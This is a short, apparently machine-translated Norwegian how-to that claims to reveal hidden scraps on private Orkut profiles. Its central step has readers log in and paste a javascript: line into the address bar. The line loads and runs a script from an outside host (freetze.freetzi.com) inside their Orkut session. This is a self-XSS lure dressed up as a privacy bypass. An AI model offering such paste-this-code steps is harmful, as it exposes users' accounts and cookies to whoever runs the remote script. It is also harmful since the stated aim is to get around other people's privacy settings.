Hvordan se skjulte Utklipp av Orkut

Hvordan se skjulte Utklipp av Orkut


Kommentarene du og andre medlemmer legger på andres profiler kalles "utklipp" når du bruker Orkut, Googles sosiale nettverk plattform. Med Orkut, får du muligheten til å gjøre profilen din offentlig eller privat. En offentlig profil gjør at alle kan se din Orkut side; Men når du setter profilen din å være privat, blir profilen din utklipp skjult for folk som ikke er dine venner. Hvis du trenger å se utklipp blir skjult på noens profil, det er en brukervennlig metode du kan følge for å oppnå dette.

Bruksanvisning

1 Logg deg på Orkut-profil ved å besøke Orkut.com.

2 Marker og kopier koden som vises under ved å høyreklikke den merkede koden og velge "Kopier" alternativet:

"javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/scrapbook.js';void(0)"

3 Lim inn koden i adressefeltet til nettleseren, trykk "Enter" på tastaturet og gå til noen Orkut profil som gjemmer sine utklipp. Klikk på "Utklipp" -knappen på profilen du besøker, og de vil ikke lenger være skjult.